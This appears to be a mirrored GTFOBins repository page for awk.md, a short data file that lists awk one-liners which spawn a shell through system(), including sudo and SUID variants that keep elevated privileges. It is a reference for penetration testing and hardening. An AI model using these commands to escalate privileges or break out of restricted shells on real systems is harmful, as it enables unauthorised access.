1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-19 05:51:36 +01:00
GTFOBins.github.io/_gtfobins/awk.md
2018-05-21 20:14:41 +01:00

9 lines
215 B
Markdown

---
functions:
exec-interactive:
- code: awk 'BEGIN {system("/bin/sh")}'
sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
suid-limited:
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
---